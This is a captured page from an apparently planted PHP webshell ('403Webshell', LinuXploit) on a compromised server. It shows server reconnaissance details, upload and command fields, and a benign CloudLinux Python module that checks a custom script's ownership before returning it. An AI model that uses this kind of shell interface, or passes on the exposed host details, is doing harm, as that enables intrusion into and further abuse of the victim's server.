403Webshell
Server IP : 162.19.112.25  /  Your IP : 216.73.216.88
Web Server : LiteSpeed
System : Linux qamar.tasjeel.ae 5.14.0-611.55.1.el9_7.x86_64 #1 SMP PREEMPT_DYNAMIC Tue May 19 15:19:29 EDT 2026 x86_64
User : archiart ( 1428)
PHP Version : 8.2.33
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /proc/thread-self/root/opt/cloudlinux/venv/lib/python3.11/site-packages/clcommon/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /proc/thread-self/root/opt/cloudlinux/venv/lib/python3.11/site-packages/clcommon/clcustomscript.py
#!/usr/bin/python
# coding=utf-8
import os
import stat

__author__ = "Aleksandr Shyshatsky"


def _is_safe_script(path):
    """Return True only if path is absolute, a regular file, executable,
    owned by root, and not writable by group or other (F-13)."""
    if not (os.path.isabs(path) and os.path.isfile(path)
            and os.access(path, os.X_OK)):
        return False
    try:
        st = os.stat(path)
    except OSError:
        return False
    if st.st_uid != 0 or st.st_gid != 0:
        return False
    if st.st_mode & (stat.S_IWGRP | stat.S_IWOTH):
        return False
    return True


def lvectl_custompanel_script():
    """
    Retrives custom panel script for lvectl from CL config file
    :return: Script full path or None if script filename not find in config
    """
    config_param_name = 'CUSTOM_GETPACKAGE_SCRIPT'
    try:
        # Try to determine custom script name
        if os.path.exists(CLSYSCONFIG):
            with open(CLSYSCONFIG, 'r', encoding='utf-8') as f:
                file_lines = f.readlines()
            for line in file_lines:
                line = line.strip()
                if line.startswith(config_param_name):
                    line_parts = line.split('=')
                    if len(line_parts) == 2 and line_parts[0].strip() == config_param_name:
                        script_name = line_parts[1].strip()
                        if _is_safe_script(script_name):
                            return script_name
    except (OSError, IOError, IndexError):
        # We are ignoring all errors, but script name not found in this case
        pass
    # Script name not found or error
    return None


CLSYSCONFIG = '/etc/sysconfig/cloudlinux'

Youez - 2016 - github.com/yon3zu
LinuXploit